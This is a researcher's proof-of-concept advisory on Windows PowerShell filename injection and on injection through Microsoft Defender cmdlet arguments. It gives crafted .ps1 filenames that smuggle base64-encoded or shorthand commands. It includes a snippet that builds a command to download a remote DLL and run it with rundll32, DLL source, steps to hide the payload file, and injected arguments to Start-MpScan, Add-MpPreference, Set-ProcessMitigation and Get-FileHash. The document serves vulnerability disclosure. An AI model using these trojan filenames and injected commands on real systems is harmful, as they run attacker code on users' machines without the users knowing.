Windows PowerShell Filename and Defender Anti-Malware API - Code Execution POC
Discovery: John Page (aka hyp3rlinx) 2019 and revisted 2023
Updated: Dec 7, 2023 added CL and Windows Defender API vector, see below:
Since it still works, I dusted off and made minor improvements:
- Execute a remote DLL using rundll32
- Execute an unintended secondary PS1 script or local text-file (can be hidden)
- Updated the PS1 Trojan Filename Creator Python3 Script
First reported to Microsoft back in 2019 yet remains unfixed as of the time of this writing.
Remote code execution via a specially crafted filename.
The flaw is due to semicolon ";" we can decode a Base64 command and execute straight from the PS1 filename or just exec commands.
Test;POweRsHeLL -e [BASE64 UTF-16LE PAYLOAD];.ps1
Call commands straight away
"Testing;saps (gc -) PoC;.ps1"
Vectors: double click, drag and drop to PS shortcut
Leverages alternate shorthand PS commands like "saps", "gc" start a process and get-content etc.
Create a trojan PS1 file that will try to download and execute a remote DLL named "1.d"
from base64 import b64encode
b64encode("saps http[]//;sleep -s 2;rundll32 $HOME\Downloads\1.d, 0".encode('UTF-16LE'))
DLL Code:
#include <windows.h>
//gcc -shared -o mydll.dll mydll.c -m32
void evilo(void){
MessageBox(0,"Filename Remote Code Execution PoC\r\nBy hyp3rlinx","M$ Windows PowerShell",1);
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){
return 0;
python -m http.server 80
Double click the trojan PS1 file.
Create a PS1 file with name including saps "start a process" and gc "get-content", this will read commands from hidden file.
"Test;saps (gc -) PoC;.ps1"
Create hidden: attrib +s +h "-"
Double click or drag and drop.
a) PowerShell PS1 files must be set to open with PowerShell as the default program
b) Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force
c) User must double-click, run from cmd line or drag and drop the maliciously named PS1 script
Update: Microsoft Defender Anti-Malware PowerShell API - Arbitrary Code Execution.
Microsoft Defender Anti Malware and or PS API's can result in executing arbitrary code. E.g. scan a directory, shortcut .lnk or even non-existent item, may execute unintended code. This vector builds upon my previous advisory and subsequent project PSTrojanFile.
- On CL 'powershell' cmd is prefixed or passed in by calling PowerShell from another script
- Executable file of same name as the parameter that lives nearby
powershell Start-MpScan -Scanpath "C:\Users\gg\Downloads;saps Helper;"
(Helper.exe lives on Desktop)
Create directory ";saps Test", Test.exe, Test.cmd etc is on same CL path
powershell Add-MpPreference -ControlledFolderAccessAllowedApplications ";saps Test"
Create directory with semicolon, drop PE file named doom.exe in same path.
powershell Set-ProcessMitigation -PolicyFilePath "test;saps doom"
Last but not least:
When grabbing a file hash in PowerShell logs you out :)
c:>powershell get-filehash -algorithm MD5 "Malware;saps logoff.exe"